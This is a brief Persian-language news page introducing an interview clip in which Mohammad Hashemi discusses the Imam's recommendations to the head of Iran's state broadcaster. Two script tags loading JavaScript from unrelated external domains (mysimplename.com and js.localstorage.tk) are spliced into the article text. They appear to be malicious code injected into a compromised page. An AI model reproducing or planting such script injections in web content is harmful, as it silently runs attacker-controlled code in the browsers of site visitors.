توصیه های امام به رئیس صدا و سیما


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>بخشی از مصاحبه محمد هاشمی ، برادر و رئیس دفتر رئیس مجمع تشخیص مصلحت نظام با تلویزیون اینترنتی آرمان در مورد توصیه های امام به رئیس صدا و سیما<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
1

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر